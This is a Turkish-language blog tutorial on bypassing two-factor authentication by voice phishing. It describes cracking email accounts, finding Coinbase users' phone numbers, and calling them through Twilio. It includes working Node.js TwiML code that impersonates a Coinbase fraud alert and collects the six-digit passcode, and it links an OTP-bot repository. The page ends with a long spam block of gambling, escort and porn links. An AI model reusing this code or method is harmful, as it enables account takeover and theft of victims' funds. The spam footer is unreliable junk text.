IVR ile OTP Bypass Nasıl Yapılır?

Bu makalemizde profesyonel şekilde IVR hizmetlerini kullanarak ?OTP (one-time-password) yada diğer adıyla iki adımlı doğrulama kullanan hesaplara yada sistemlere gireceğinizi anlatacağım. Yapacağımız işlem sosyal mühendislik olsa da diğer yöntemlere göre başarı oranı çok yüksek diyebilirim. İlk önce bir IVR hizmeti veren bir firmadan api almamız lazım. Twilio bu yapacağımız işlem için güzel makalenin sonunda Twilio için yazılmış bir Discord botu da vereceğim. Siz Twilio yerine farklı apilerde kullanabilirsiniz fark etmez.

Şimdi örnek olarak son dönemlerde bu yöntem ile genellikle coinbase hesapları hackleniyor ve boşaltılıyor. Bizde bu olay üzerinden bir örnek ile gidelim. Mail hesaplarını checkleyen bir arkadaşın hikayesi olsun bu da;

Saldırgan ilk önce mail checker ile coinbase keyword içeren bir mail hesabı crackliyor.

Ekran görüntüsü bize ait değildir.

Hesaba giriş yapmaya çalışıyor ama giriş yapmak için hesabın sahibine gönderilen doğrulama kodunu öğrenmesi bulması lazım.

Phone Verify Issue - Authenticator code not working and not receiving SMS/Text. Please Help!: CoinBase
Ekran görüntüsü bize ait değildir.

Mail hesabından kullanıcının telefon numarasını öğreniyor. Twilio ile o numaraya arama başlatıyor.

app.post('/coinbase', (request, response) => {
    // Use the Twilio Node.js SDK to build an XML response
    const twiml = new VoiceResponse();

    // Use the <Gather> verb to collect user input
    const gather = twiml.gather({
        action: '/gather',
        method: 'POST',
        input: 'dtmf',
        numDigits: 6,
    });
    gather.say("Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.")

    response.type('text/xml');
    response.send(twiml.toString());
});

Bot aramayı başlatıyor sonra karşı taraf telefonu açtıktan sonra sesli olarak hedef kişi şunları duyuyor 😀 ” Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.” bunu duyan kurban ? hemen doğrulama kodunu tuş takımından ? giriyor ve kod panelimize geliyor. ?

Ekran görüntüsü bize ait değildir.

Discord Bot: https://github.com/SirTenzin/OTP-Bot

Twilio API Dökümanları: https://www.twilio.com/docs/voice

Etiketler

2 Yorum

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Başa dön tuşu
hacklink al duşakabin fiyatları fethiye escort bayan escort - vip elit escort dizi film izle erotik film izle duşakabin hack forum casibom marsbahis marsbahisgirtr marsbahis matadorbet casibom starzbet dinamobet nulled scriptfethiye escortbomb bonanza oynaboom city oynasugar rush oynablackbull oynashining hot oynaaviator oynaaviator oynatombala oynatropical tiki oynacandy palace oynaegt slot oynafire hot oynapragmatic slot oyunlarıstriking hot oynahappy hooves oynabarn festival oynaintobet girişegt slot oyunlarıvozolMedusabahis girişPendik EscortMaltepe Escortbetmavera girişفيديو اباحيiqosاباحي عربيMedusabahis girişhd pornoenobahishilarionbetvozol 6000tanıtım yazısı nedirDuşakabin Fiyatlarıduşakabin modelleriduşakabin tekerleğiduşakabin camıduşakabin temizliğiiqos heetsheets sigaraMaltese Terriermatadorbetcasibom国产线播放免费人成视频播放sekabetcasibomvozol 12000elektronik sigara fiyatlarıholiganbetimajbetiqoscasibomjojobetBetofficePusulabetholiganbetmarsbahis güncel adresmatbetvozolsahabetonwincasibomkralbetcasibomnakitbahisbets10mobilbahiscasibom国产线播放免费人成视频播放piabellacasinoholiganbetSumak Sirkesi Nasıl YapılırcasinometropolDeneme Bonusu Veren Sitelerxxx videoscercevedinamobetbahsegelinstagram ban servicenehirsohbet.combahsegelsahabetbeylikduzu escortbetturkeybetturkeybetparkstarzbettipobetRüyabetbycasinosıcak sohbet hattızbahisvegasslot girişsekabet twitter casibomdinamobetdinamobetonwinxslotdinamobettempobettipobetperabetvdcasinomariobethitbetlunabet girişkavbetcasibom1xbettarafbetpokerklasbetpasbetboomaltcasinomariobetwinxbetcasibomcasibomhitbet girisdinamobetbaywin girişjojobetklasbahisbetinebetorspinMatadorbetbayspin girişbaywin girişbetkomjojobetjojobetMarsbahis Girişjojobetpusulabettümbetjojobetbahsegelcasibom giriş twittersafirbettümbetjojobetbetkanyongrandbettingkalebet7slotsdinamobetcasibomtumbettümbetsuperbahis yeni adresibetparksuperbetinvbetbetturkeycasibomjojobetcasibommarsbahisimajbetmatbetjojobetholiganbetsekabetonwinsahabetonwinmarsbahisnakitbahispiabellacasinomeritkingdumanbetdinamobetgalabetimajbetjojobetjojobetmatbetdinamobetjojobetcasibommostbetbetmoongalabethiltonbetparibahisbetsmovebetnanomavibetçanakkale son dakikabetwoonvevobahisbetparksuperbetinvbetvbetgoldenbahisbetsmovebetsmovebetcupbetcupbahigobahigobetnanoasyabahismavibetcasibomlunabetcasibomcasibommariobettipobetvdcasinovozol puff sigaradinamobetbahiscomYouwintarafbetonwinsahabetmatadorbettipobetonwin girişmatadorbet girişsahabet girişstarzbetbetpublicsüpertotobetfixbetxslotbetmatikbetkommariobettarafbetbahiscom1xbetgrandpashabetsahabetsafirbetsahabetstarzbet twitterjojobetstarzbetvbetcasino levantbetebetjojobetholiganbetcasibommarsbahismatbetsekabetonwinsahabetgrandpashabetnakitbahismeritkingbahsegelcratosslotkralbetdinamobetbetkanyonbets10imajbetgrandpashabetYouwin GirişHepsibahisfixbetonwingrandpashabetklasbahiskalebetPerabetholiganbettarafbetpokerklasbetpasbetpasbetbootarafbettarafbet twitterDeneme bonusu veren sitelerCratosslot girişMatadorbettarafbetMatadorbetmeritkingtümbetmarsbahispusulabet7slotsbets10grandpashabetholiganbetsekabetThesakultahodeonbetextrabetextrabetextrabet twitterextrabetmeritkingmarsbahisbetvoleholiganbetzbahisSahabetbetvolegrandpashabetcasibomcasibombetebetsekabetBetkanyonBetkanyonbayspin güncelhitbet girişlunabet güncelkavbet giriştümbet twittermavibet girişholiganbet twitterdinamobethitbet twittermarsbahismarsbahisbettiltimajbetdinamobetmariobetsahabetjojobet